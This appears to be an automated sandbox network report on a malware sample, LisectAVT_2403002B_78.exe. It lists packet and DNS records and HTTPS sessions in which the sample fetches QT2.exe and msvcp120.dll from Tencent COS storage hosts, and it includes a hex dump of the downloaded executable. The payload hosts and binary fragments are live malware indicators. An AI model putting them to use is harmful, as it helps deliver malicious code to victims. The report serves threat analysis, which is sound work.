                                                                    Jul 25, 2024 11:25:53.326833010 CEST49720443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:53.332427025 CEST4434972043.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:53.332479954 CEST4434972043.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:53.332508087 CEST49720443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:53.332518101 CEST4434972043.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:53.332550049 CEST49720443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:53.332550049 CEST49720443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:53.342935085 CEST4434972043.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:53.342962980 CEST4434972043.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:53.343085051 CEST49720443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:53.343085051 CEST49720443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:53.343095064 CEST4434972043.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:53.344129086 CEST49720443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:53.370704889 CEST4434972043.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:53.370731115 CEST4434972043.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:53.370919943 CEST49720443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:53.370930910 CEST4434972043.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:53.371412039 CEST49720443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:53.375664949 CEST4434972043.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:53.375715017 CEST4434972043.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:53.375771999 CEST49720443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:53.375771999 CEST49720443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:53.375780106 CEST4434972043.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:53.375797033 CEST4434972043.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:53.375832081 CEST49720443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:53.375859976 CEST49720443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:53.376386881 CEST49720443192.168.2.643.152.64.193
                                                                    Jul 25, 2024 11:25:53.376400948 CEST4434972043.152.64.193192.168.2.6
                                                                    Jul 25, 2024 11:25:53.796091080 CEST49722443192.168.2.643.153.232.151
                                                                    Jul 25, 2024 11:25:53.796144009 CEST4434972243.153.232.151192.168.2.6
                                                                    Jul 25, 2024 11:25:53.796252966 CEST49722443192.168.2.643.153.232.151
                                                                    Jul 25, 2024 11:25:53.796571016 CEST49722443192.168.2.643.153.232.151
                                                                    Jul 25, 2024 11:25:53.796591997 CEST4434972243.153.232.151192.168.2.6
                                                                    Jul 25, 2024 11:25:55.308381081 CEST4434972243.153.232.151192.168.2.6
                                                                    Jul 25, 2024 11:25:55.308515072 CEST49722443192.168.2.643.153.232.151
                                                                    Jul 25, 2024 11:25:55.309278011 CEST4434972243.153.232.151192.168.2.6
                                                                    Jul 25, 2024 11:25:55.309345961 CEST49722443192.168.2.643.153.232.151
                                                                    Jul 25, 2024 11:25:55.322448015 CEST49722443192.168.2.643.153.232.151
                                                                    Jul 25, 2024 11:25:55.322489977 CEST4434972243.153.232.151192.168.2.6
                                                                    Jul 25, 2024 11:25:55.322846889 CEST4434972243.153.232.151192.168.2.6
                                                                    Jul 25, 2024 11:25:55.323201895 CEST49722443192.168.2.643.153.232.151
                                                                    Jul 25, 2024 11:25:55.323503017 CEST49722443192.168.2.643.153.232.151
                                                                    Jul 25, 2024 11:25:55.368509054 CEST4434972243.153.232.151192.168.2.6
                                                                    Jul 25, 2024 11:25:56.124305964 CEST4434972243.153.232.151192.168.2.6
                                                                    Jul 25, 2024 11:25:56.124340057 CEST4434972243.153.232.151192.168.2.6
                                                                    Jul 25, 2024 11:25:56.124361992 CEST4434972243.153.232.151192.168.2.6
                                                                    Jul 25, 2024 11:25:56.124412060 CEST49722443192.168.2.643.153.232.151
                                                                    Jul 25, 2024 11:25:56.124443054 CEST49722443192.168.2.643.153.232.151
                                                                    Jul 25, 2024 11:25:56.124454021 CEST4434972243.153.232.151192.168.2.6
                                                                    Jul 25, 2024 11:25:56.124501944 CEST49722443192.168.2.643.153.232.151
                                                                    Jul 25, 2024 11:25:56.203646898 CEST4434972243.153.232.151192.168.2.6
                                                                    Jul 25, 2024 11:25:56.203813076 CEST49722443192.168.2.643.153.232.151
                                                                    Jul 25, 2024 11:25:56.203843117 CEST4434972243.153.232.151192.168.2.6
                                                                    Jul 25, 2024 11:25:56.204039097 CEST49722443192.168.2.643.153.232.151
                                                                    Jul 25, 2024 11:25:56.207369089 CEST4434972243.153.232.151192.168.2.6
                                                                    Jul 25, 2024 11:25:56.207401037 CEST4434972243.153.232.151192.168.2.6
                                                                    Jul 25, 2024 11:25:56.207437992 CEST49722443192.168.2.643.153.232.151
                                                                    Jul 25, 2024 11:25:56.207448006 CEST4434972243.153.232.151192.168.2.6
                                                                    Jul 25, 2024 11:25:56.207474947 CEST49722443192.168.2.643.153.232.151
                                                                    Jul 25, 2024 11:25:56.207479000 CEST4434972243.153.232.151192.168.2.6
                                                                    Jul 25, 2024 11:25:56.207499027 CEST49722443192.168.2.643.153.232.151
                                                                    Jul 25, 2024 11:25:56.207529068 CEST49722443192.168.2.643.153.232.151
                                                                    Jul 25, 2024 11:25:56.207897902 CEST49722443192.168.2.643.153.232.151
                                                                    Jul 25, 2024 11:25:56.207915068 CEST4434972243.153.232.151192.168.2.6
                                                                    Jul 25, 2024 11:26:00.424228907 CEST49723443192.168.2.6159.75.57.35
                                                                    Jul 25, 2024 11:26:00.424290895 CEST44349723159.75.57.35192.168.2.6
                                                                    Jul 25, 2024 11:26:00.424388885 CEST49723443192.168.2.6159.75.57.35
                                                                    Jul 25, 2024 11:26:00.424693108 CEST49723443192.168.2.6159.75.57.35
                                                                    Jul 25, 2024 11:26:00.424707890 CEST44349723159.75.57.35192.168.2.6
                                                                    Jul 25, 2024 11:26:02.101902008 CEST44349723159.75.57.35192.168.2.6
                                                                    Jul 25, 2024 11:26:02.102042913 CEST49723443192.168.2.6159.75.57.35
                                                                    Jul 25, 2024 11:26:02.102678061 CEST44349723159.75.57.35192.168.2.6
                                                                    Jul 25, 2024 11:26:02.102751970 CEST49723443192.168.2.6159.75.57.35
                                                                    Jul 25, 2024 11:26:02.107192039 CEST49723443192.168.2.6159.75.57.35
                                                                    Jul 25, 2024 11:26:02.107212067 CEST44349723159.75.57.35192.168.2.6
                                                                    Jul 25, 2024 11:26:02.116831064 CEST44349723159.75.57.35192.168.2.6
                                                                    Jul 25, 2024 11:26:02.116918087 CEST49723443192.168.2.6159.75.57.35
                                                                    Jul 25, 2024 11:26:02.117296934 CEST49723443192.168.2.6159.75.57.35
                                                                    Jul 25, 2024 11:26:02.160501003 CEST44349723159.75.57.35192.168.2.6
                                                                    Jul 25, 2024 11:26:02.651242018 CEST44349723159.75.57.35192.168.2.6
                                                                    Jul 25, 2024 11:26:02.651386976 CEST49723443192.168.2.6159.75.57.35
                                                                    Jul 25, 2024 11:26:02.651417971 CEST44349723159.75.57.35192.168.2.6
                                                                    Jul 25, 2024 11:26:02.651473999 CEST49723443192.168.2.6159.75.57.35
                                                                    Jul 25, 2024 11:26:02.651895046 CEST49723443192.168.2.6159.75.57.35
                                                                    Jul 25, 2024 11:26:02.651942968 CEST44349723159.75.57.35192.168.2.6
                                                                    Jul 25, 2024 11:26:02.652020931 CEST49723443192.168.2.6159.75.57.35
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jul 25, 2024 11:25:33.315958023 CEST5047953192.168.2.61.1.1.1
                                                                    Jul 25, 2024 11:25:33.826421022 CEST53504791.1.1.1192.168.2.6
                                                                    Jul 25, 2024 11:25:53.475308895 CEST6459853192.168.2.61.1.1.1
                                                                    Jul 25, 2024 11:25:53.795103073 CEST53645981.1.1.1192.168.2.6
                                                                    Jul 25, 2024 11:25:59.231690884 CEST6499953192.168.2.61.1.1.1
                                                                    Jul 25, 2024 11:26:00.244570017 CEST6499953192.168.2.61.1.1.1
                                                                    Jul 25, 2024 11:26:00.423160076 CEST53649991.1.1.1192.168.2.6
                                                                    Jul 25, 2024 11:26:00.423181057 CEST53649991.1.1.1192.168.2.6
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Jul 25, 2024 11:25:33.315958023 CEST192.168.2.61.1.1.10xed11Standard query (0)wwwdll-1323570959.cos.ap-singapore.myqcloud.comA (IP address)IN (0x0001)false
                                                                    Jul 25, 2024 11:25:53.475308895 CEST192.168.2.61.1.1.10x904bStandard query (0)www80-1323570959.cos.ap-singapore.myqcloud.comA (IP address)IN (0x0001)false
                                                                    Jul 25, 2024 11:25:59.231690884 CEST192.168.2.61.1.1.10x7465Standard query (0)wwwbin-1323571107.cos.ap-guangzhou.myqcloud.comA (IP address)IN (0x0001)false
                                                                    Jul 25, 2024 11:26:00.244570017 CEST192.168.2.61.1.1.10x7465Standard query (0)wwwbin-1323571107.cos.ap-guangzhou.myqcloud.comA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Jul 25, 2024 11:25:33.826421022 CEST1.1.1.1192.168.2.60xed11No error (0)wwwdll-1323570959.cos.ap-singapore.myqcloud.comsgp.file.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jul 25, 2024 11:25:33.826421022 CEST1.1.1.1192.168.2.60xed11No error (0)sgp.file.myqcloud.com43.152.64.193A (IP address)IN (0x0001)false
                                                                    Jul 25, 2024 11:25:33.826421022 CEST1.1.1.1192.168.2.60xed11No error (0)sgp.file.myqcloud.com43.152.64.207A (IP address)IN (0x0001)false
                                                                    Jul 25, 2024 11:25:33.826421022 CEST1.1.1.1192.168.2.60xed11No error (0)sgp.file.myqcloud.com43.153.232.151A (IP address)IN (0x0001)false
                                                                    Jul 25, 2024 11:25:33.826421022 CEST1.1.1.1192.168.2.60xed11No error (0)sgp.file.myqcloud.com43.153.232.152A (IP address)IN (0x0001)false
                                                                    Jul 25, 2024 11:25:53.795103073 CEST1.1.1.1192.168.2.60x904bNo error (0)www80-1323570959.cos.ap-singapore.myqcloud.comsgp.file.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jul 25, 2024 11:25:53.795103073 CEST1.1.1.1192.168.2.60x904bNo error (0)sgp.file.myqcloud.com43.153.232.151A (IP address)IN (0x0001)false
                                                                    Jul 25, 2024 11:25:53.795103073 CEST1.1.1.1192.168.2.60x904bNo error (0)sgp.file.myqcloud.com43.153.232.152A (IP address)IN (0x0001)false
                                                                    Jul 25, 2024 11:25:53.795103073 CEST1.1.1.1192.168.2.60x904bNo error (0)sgp.file.myqcloud.com43.152.64.193A (IP address)IN (0x0001)false
                                                                    Jul 25, 2024 11:25:53.795103073 CEST1.1.1.1192.168.2.60x904bNo error (0)sgp.file.myqcloud.com43.152.64.207A (IP address)IN (0x0001)false
                                                                    Jul 25, 2024 11:26:00.423160076 CEST1.1.1.1192.168.2.60x7465No error (0)wwwbin-1323571107.cos.ap-guangzhou.myqcloud.comgz.file.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jul 25, 2024 11:26:00.423160076 CEST1.1.1.1192.168.2.60x7465No error (0)gz.file.myqcloud.com159.75.57.35A (IP address)IN (0x0001)false
                                                                    Jul 25, 2024 11:26:00.423160076 CEST1.1.1.1192.168.2.60x7465No error (0)gz.file.myqcloud.com159.75.57.69A (IP address)IN (0x0001)false
                                                                    Jul 25, 2024 11:26:00.423160076 CEST1.1.1.1192.168.2.60x7465No error (0)gz.file.myqcloud.com159.75.57.36A (IP address)IN (0x0001)false
                                                                    Jul 25, 2024 11:26:00.423181057 CEST1.1.1.1192.168.2.60x7465No error (0)wwwbin-1323571107.cos.ap-guangzhou.myqcloud.comgz.file.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jul 25, 2024 11:26:00.423181057 CEST1.1.1.1192.168.2.60x7465No error (0)gz.file.myqcloud.com159.75.57.35A (IP address)IN (0x0001)false
                                                                    Jul 25, 2024 11:26:00.423181057 CEST1.1.1.1192.168.2.60x7465No error (0)gz.file.myqcloud.com159.75.57.69A (IP address)IN (0x0001)false
                                                                    Jul 25, 2024 11:26:00.423181057 CEST1.1.1.1192.168.2.60x7465No error (0)gz.file.myqcloud.com159.75.57.36A (IP address)IN (0x0001)false
                                                                    • wwwdll-1323570959.cos.ap-singapore.myqcloud.com
                                                                    • www80-1323570959.cos.ap-singapore.myqcloud.com
                                                                    • wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.64971143.152.64.1934434800C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-07-25 09:25:35 UTC130OUTGET /QT2.exe HTTP/1.1
                                                                    User-Agent: Mozilla/5.0
                                                                    Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com
                                                                    Cache-Control: no-cache
                                                                    2024-07-25 09:25:36 UTC473INHTTP/1.1 200 OK
                                                                    Content-Type: application/x-msdownload
                                                                    Content-Length: 1659120
                                                                    Connection: close
                                                                    Accept-Ranges: bytes
                                                                    Content-Disposition: attachment
                                                                    Date: Thu, 25 Jul 2024 09:25:36 GMT
                                                                    ETag: "5f29a3a467d2b501ffdac96e72665b83"
                                                                    Last-Modified: Mon, 18 Mar 2024 08:55:28 GMT
                                                                    Server: tencent-cos
                                                                    x-cos-force-download: true
                                                                    x-cos-hash-crc64ecma: 8467060223181731739
                                                                    x-cos-request-id: NjZhMjFhMTBfM2NhZjQ4MGJfMzQ1NGFfNjE3NTNh
                                                                    x-cos-server-side-encryption: AES256
                                                                    2024-07-25 09:25:36 UTC7731INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed f1 96 5b a9 90 f8 08 a9 90 f8 08 a9 90 f8 08 37 30 3f 08 ab 90 f8 08 a4 c2 27 08 a3 90 f8 08 a4 c2 18 08 ba 90 f8 08 74 6f 29 08 a8 90 f8 08 a4 c2 25 08 ad 90 f8 08 a4 c2 19 08 ae 90 f8 08 74 6f 36 08 a7 90 f8 08 74 6f 28 08 a8 90 f8 08 74 6f 33 08 8b 90 f8 08 1c 0e 25 08 ac 90 f8 08 a9 90 f9 08 15 92 f8 08 1c 0e 18 08 a8 90 f8 08 1c 0e 19 08 8a 90 f8 08 1c 0e 1d 08 e8 90 f8
                                                                    Data Ascii: MZ@0!L!This program cannot be run in DOS mode.$[70?'to)%to6to(to3%
                                                                    2024-07-25 09:25:37 UTC16368INData Raw: 68 f4 d3 4f 00 b9 94 de 53 00 c6 45 fc 8a e8 3a f5 08 00 c7 45 e0 00 6b 41 00 c7 45 e4 f0 ff ff ff c7 45 e8 00 00 00 00 c7 45 ec 00 00 00 00 f3 0f 6f 45 e0 c7 05 18 df 53 00 02 00 00 00 f3 0f 7f 05 20 df 53 00 6a ff 68 e0 8f 4f 00 b9 30 df 53 00 c6 45 fc 8b e8 f2 f4 08 00 6a ff 68 18 d4 4f 00 b9 b4 df 53 00 c6 45 fc 8c e8 dd f4 08 00 c7 45 e0 00 6f 41 00 c7 45 e4 f0 ff ff ff c7 45 e8 00 00 00 00 c7 45 ec 00 00 00 00 f3 0f 6f 45 e0 c7 05 38 e0 53 00 02 00 00 00 f3 0f 7f 05 40 e0 53 00 6a ff 68 e0 8f 4f 00 b9 50 e0 53 00 c6 45 fc 8d e8 95 f4 08 00 6a ff 68 40 d4 4f 00 b9 d4 e0 53 00 c6 45 fc 8e e8 80 f4 08 00 c7 45 e0 50 6f 41 00 c7 45 e4 f0 ff ff ff c7 45 e8 00 00 00 00 c7 45 ec 00 00 00 00 f3 0f 6f 45 e0 c7 05 58 e1 53 00 02 00 00 00 f3 0f 7f 05 60 e1 53
                                                                    Data Ascii: hOSE:EkAEEEoES SjhO0SEjhOSEEoAEEEoE8S@SjhOPSEjh@OSEEPoAEEEoEXS`S
                                                                    2024-07-25 09:25:37 UTC8184INData Raw: 01 33 c9 66 a3 98 c7 52 00 66 39 0d 4c 91 50 00 b8 0d 00 00 00 c7 05 ac c7 52 00 07 00 00 00 0f 44 c1 c7 05 a8 c7 52 00 00 00 00 00 50 68 4c 91 50 00 b9 98 c7 52 00 e8 51 39 00 00 33 c0 c6 45 fc 02 33 c9 66 a3 b0 c7 52 00 66 39 0d 68 91 50 00 b8 09 00 00 00 c7 05 c4 c7 52 00 07 00 00 00 0f 44 c1 c7 05 c0 c7 52 00 00 00 00 00 50 68 68 91 50 00 b9 b0 c7 52 00 e8 10 39 00 00 33 c0 c6 45 fc 03 33 c9 66 a3 c8 c7 52 00 66 39 0d 7c 91 50 00 8b c6 c7 05 dc c7 52 00 07 00 00 00 0f 44 c1 c7 05 d8 c7 52 00 00 00 00 00 50 68 7c 91 50 00 b9 c8 c7 52 00 e8 d2 38 00 00 33 c0 c6 45 fc 04 33 c9 66 a3 e0 c7 52 00 66 39 0d a0 91 50 00 b8 1a 00 00 00 c7 05 f4 c7 52 00 07 00 00 00 0f 44 c1 c7 05 f0 c7 52 00 00 00 00 00 50 68 a0 91 50 00 b9 e0 c7 52 00 e8 91 38 00 00 33 c0 c6
                                                                    Data Ascii: 3fRf9LPRDRPhLPRQ93E3fRf9hPRDRPhhPR93E3fRf9|PRDRPh|PR83E3fRf9PRDRPhPR83
                                                                    2024-07-25 09:25:37 UTC8184INData Raw: 72 02 8b 36 51 56 ff 70 10 51 8b c8 e8 a4 10 00 00 85 c0 74 52 68 b0 86 4f 00 8d 4d bc e8 a3 1a 00 00 8b f0 8d 45 d4 c7 45 fc 05 00 00 00 50 b9 f0 78 53 00 c7 45 f0 0f 00 00 00 e8 65 1b 00 00 c7 45 fc 06 00 00 00 bb 1f 00 00 00 83 7e 14 08 8b 4e 10 89 5d f0 72 02 8b 36 51 56 ff 70 10 51 8b c8 e8 4e 10 00 00 8b 35 70 06 4f 00 f6 c3 10 74 25 83 e3 ef 83 7d e8 08 72 08 ff 75 d4 ff d6 83 c4 04 33 c0 c7 45 e8 07 00 00 00 c7 45 e4 00 00 00 00 66 89 45 d4 f6 c3 08 74 25 83 e3 f7 83 7d d0 08 72 08 ff 75 bc ff d6 83 c4 04 33 c0 c7 45 d0 07 00 00 00 c7 45 cc 00 00 00 00 66 89 45 bc f6 c3 04 74 25 83 e3 fb 83 7d b8 08 72 08 ff 75 a4 ff d6 83 c4 04 33 c0 c7 45 b8 07 00 00 00 c7 45 b4 00 00 00 00 66 89 45 a4 f6 c3 02 74 25 83 e3 fd 83 7d a0 08 72 08 ff 75 8c ff d6 83
                                                                    Data Ascii: r6QVpQtRhOMEEPxSEeE~N]r6QVpQN5pOt%}ru3EEfEt%}ru3EEfEt%}ru3EEfEt%}ru
                                                                    2024-07-25 09:25:37 UTC8184INData Raw: a3 00 00 00 00 88 55 f3 8b f9 89 7d e8 c7 45 ec 00 00 00 00 c7 45 fc 02 00 00 00 8d 5f 18 33 c0 c7 47 14 07 00 00 00 c7 47 10 00 00 00 00 66 89 07 89 43 10 8d 45 08 c7 45 ec 01 00 00 00 3b f8 74 0a 6a ff 6a 00 50 e8 b1 f5 ff ff 8d 45 20 3b d8 74 3d 8b 4b 10 85 c9 74 15 8b 11 3b cb 0f 95 c0 0f b6 c0 50 ff 52 10 c7 43 10 00 00 00 00 8b 75 30 85 f6 75 05 89 73 10 eb 18 8d 45 20 8b ce 3b f0 8b 06 75 03 53 eb 02 6a 00 ff 10 89 43 10 8b 75 30 83 7d 1c 08 8a 45 f3 88 47 30 72 0f ff 75 08 ff 15 70 06 4f 00 8b 75 30 83 c4 04 33 c0 c7 45 1c 07 00 00 00 c7 45 18 00 00 00 00 66 89 45 08 88 45 fc 85 f6 74 13 8b 16 8d 45 20 3b f0 0f 95 c1 0f b6 c9 51 8b ce ff 52 10 8b c7 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b
                                                                    Data Ascii: U}EE_3GGfCEE;tjjPE ;t=Kt;PRCu0usE ;uSjCu0}EG0rupOu03EEfEEtE ;QRMdY_^[]U
                                                                    2024-07-25 09:25:37 UTC8184INData Raw: 51 8d 45 fc 50 e8 6b 01 00 00 8b 45 0c 3b 45 10 75 a7 89 06 8b c6 5e 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc cc 55 8b ec 51 56 8b 75 08 8b c1 57 89 45 fc 8b fe 80 7e 0d 00 75 4a 53 8b 1d 70 06 4f 00 8d 49 00 ff 77 08 8b c8 e8 d6 ff ff ff 83 7e 24 08 8b 3f 72 08 ff 76 10 ff d3 83 c4 04 33 c0 c7 46 24 07 00 00 00 c7 46 20 00 00 00 00 56 66 89 46 10 ff d3 8b 45 fc 83 c4 04 80 7f 0d 00 8b f7 74 c1 5b 5f 5e 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc 55 8b ec 8b 4d 08 8b 51 08 8b 02 89 41 08 8b 02 80 78 0d 00 75 03 89 48 04 8b 41 04 89 42 04 a1 20 76 53 00 3b 48 04 75 0c 89 50 04 89 0a 89 51 04 5d c2 04 00 8b 41 04 3b 08 75 0b 89 10 89 0a 89 51 04 5d c2 04 00 89 50 08 89 0a 89 51 04 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 4d 08 8b 11 8b 42
                                                                    Data Ascii: QEPkE;Eu^]UQVuWE~uJSpOIw~$?rv3F$F VfFEt[_^]UMQAxuHAB vS;HuPQ]A;uQ]PQ]UMB
                                                                    2024-07-25 09:25:37 UTC8184INData Raw: 08 00 8b 8b 5c 05 00 00 8b f0 8b 49 1c 85 c9 74 16 8d 44 24 17 c6 44 24 17 00 50 68 40 fd 4f 00 e8 a8 90 01 00 eb 02 32 c0 8b 16 84 c0 6a 01 0f 94 c0 8b ce 0f b6 c0 50 ff 92 60 01 00 00 68 18 d5 4f 00 8d 4b 2c e8 b2 6a 08 00 0f b6 8b bc 07 00 00 6a 01 51 8b 10 8b c8 ff 92 60 01 00 00 68 98 d8 4f 00 8d 4b 2c e8 91 6a 08 00 6a 00 8b c8 8b 10 ff 92 e0 00 00 00 68 d4 ce 4f 00 8d 4b 2c e8 78 6a 08 00 8b f0 6a 01 8b ce e8 5d 94 09 00 6a 04 8b ce e8 74 93 09 00 8b 16 8b ce 68 c0 d9 4f 00 68 80 90 4f 00 ff 92 2c 01 00 00 8b 06 8b ce 68 cc d9 4f 00 68 dc d9 4f 00 ff 90 2c 01 00 00 68 f4 ce 4f 00 8d 4b 2c e8 2f 6a 08 00 8b f0 6a 01 8b ce e8 14 94 09 00 6a 04 8b ce e8 2b 93 09 00 8b 16 8b ce 68 c0 d9 4f 00 68 80 90 4f 00 ff 92 2c 01 00 00 8b 06 8b ce 68 cc d9 4f 00
                                                                    Data Ascii: \ItD$D$Ph@O2jP`hOK,jjQ`hOK,jjhOK,xjj]jthOhO,hOhO,hOK,/jjj+hOhO,hO
                                                                    2024-07-25 09:25:37 UTC8184INData Raw: cd 4f 00 8d 4e 2c e8 fa 4a 08 00 8b f8 6a 0c 8b cf e8 bf ae 09 00 56 8d 95 1c fe ff ff 8b cf e8 71 bc 00 00 83 c4 04 c7 45 fc ff ff ff ff 83 bd 1c fe ff ff 00 74 2f 8d 8d 1c fe ff ff ff 15 3c 04 4f 00 ff b5 94 fb ff ff 8b 95 20 fe ff ff 51 8b 8d 1c fe ff ff e8 9a d1 00 00 ff b5 1c fe ff ff ff d3 83 c4 0c 68 1c cd 4f 00 8d 4e 2c e8 92 4a 08 00 8b d8 6a 0c 8b cb 89 9d 9c fb ff ff e8 51 ae 09 00 56 8d 96 90 05 00 00 8b cb e8 33 bd 00 00 8b 8e 94 05 00 00 b8 ab aa aa 2a 2b 8e 90 05 00 00 83 c4 04 8b 1b 8b bd 9c fb ff ff f7 e9 8b cf c1 fa 02 8b c2 c1 e8 1f 03 c2 0f 95 c0 0f b6 c0 50 ff 93 f0 00 00 00 8b cf e8 55 8b 09 00 0d 00 80 00 00 8b cf 50 e8 d8 af 09 00 8b 8e 58 05 00 00 8d 85 20 fe ff ff 50 e8 56 58 01 00 8b 8e 58 05 00 00 e8 1b 57 01 00 8b 9d 24 fe ff
                                                                    Data Ascii: ON,JjVqEt/<O QhON,JjQV3*+PUPX PVXXW$
                                                                    2024-07-25 09:25:37 UTC8184INData Raw: ff ff 8b 8e 58 05 00 00 8d 44 24 14 c7 84 24 28 01 00 00 0e 00 00 00 8b 09 50 68 10 fb 4f 00 e8 a9 33 01 00 c7 84 24 28 01 00 00 ff ff ff ff 83 7c 24 28 08 72 09 ff 74 24 14 ff d7 83 c4 04 8a 86 df 06 00 00 8b 8e 58 05 00 00 88 84 24 e4 00 00 00 8d 84 24 e4 00 00 00 50 68 c0 fc 4f 00 8b 09 e8 17 32 01 00 8a 86 e1 06 00 00 8b 8e 58 05 00 00 88 84 24 e4 00 00 00 8d 84 24 e4 00 00 00 50 68 a0 fc 4f 00 8b 09 e8 f0 31 01 00 8a 86 ea 06 00 00 8b 8e 58 05 00 00 88 84 24 e4 00 00 00 8d 84 24 e4 00 00 00 50 68 20 fc 4f 00 8b 09 e8 c9 31 01 00 8a 86 e0 06 00 00 8b 8e 58 05 00 00 88 84 24 e4 00 00 00 8d 84 24 e4 00 00 00 50 68 80 fc 4f 00 8b 09 e8 a2 31 01 00 33 c0 c7 44 24 28 07 00 00 00 6a ff 50 66 89 44 24 1c 8d 4c 24 1c 8d 86 30 06 00 00 c7 44 24 2c 00 00 00 00
                                                                    Data Ascii: XD$$(PhO3$(|$(rt$X$$PhO2X$$PhO1X$$Ph O1X$$PhO13D$(jPfD$L$0D$,
                                                                    2024-07-25 09:25:37 UTC8184INData Raw: d6 e8 bf 06 01 00 8b c8 c6 45 fc 01 83 79 14 08 72 02 8b 09 8b 07 51 8b cf ff 50 3c 83 bd 64 ff ff ff 08 72 0f ff b5 50 ff ff ff ff 15 70 06 4f 00 83 c4 04 33 c0 c7 85 64 ff ff ff 07 00 00 00 8d 8d 68 ff ff ff c7 85 60 ff ff ff 00 00 00 00 66 89 85 50 ff ff ff 89 b3 1c 06 00 00 c7 45 fc ff ff ff ff e8 1c d6 07 00 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d f0 33 cd e8 1e 89 0c 00 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 66 04 4e 00 64 a1 00 00 00 00 50 81 ec a4 00 00 00 a1 20 c3 52 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b d9 8b 75 08 8d 85 68 ff ff ff 68 84 00 00 00 6a 00 50 e8 8c 90 0c 00 8b 8e 08 01 00 00 8d 95 68 ff ff ff 83 c4 0c 8b 01 52 ff 50 38 8d 45 ec c7 45 fc 00 00 00 00 50 68 14 f6 4f
                                                                    Data Ascii: EyrQP<drPpO3dh`fPEMdY_^[M3]UjhfNdP R3ESVWPEduhhjPhRP8EEPhO


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.64971343.152.64.1934434800C:\Users\user\Desktop\LisectAVT_2403002B_78.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-07-25 09:25:39 UTC135OUTGET /msvcp120.dll HTTP/1.1
                                                                    User-Agent: Mozilla/5.0
                                                                    Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com
                                                                    Cache-Control: no-cache
                                                                    2024-07-25 09:25:40 UTC472INHTTP/1.1 200 OK
                                                                    Content-Type: application/x-msdownload
                                                                    Content-Length: 455328
                                                                    Connection: close
                                                                    Accept-Ranges: bytes
                                                                    Content-Disposition: attachment
                                                                    Date: Thu, 25 Jul 2024 09:25:40 GMT
                                                                    ETag: "fd5cabbe52272bd76007b68186ebaf00"
                                                                    Last-Modified: Mon, 18 Mar 2024 00:32:34 GMT
                                                                    Server: tencent-cos
                                                                    x-cos-force-download: true
                                                                    x-cos-hash-crc64ecma: 9055190654433826812
                                                                    x-cos-request-id: NjZhMjFhMTRfNWFmNGQwYl82NmU3XzVlMTM4MA==
                                                                    x-cos-server-side-encryption: AES256
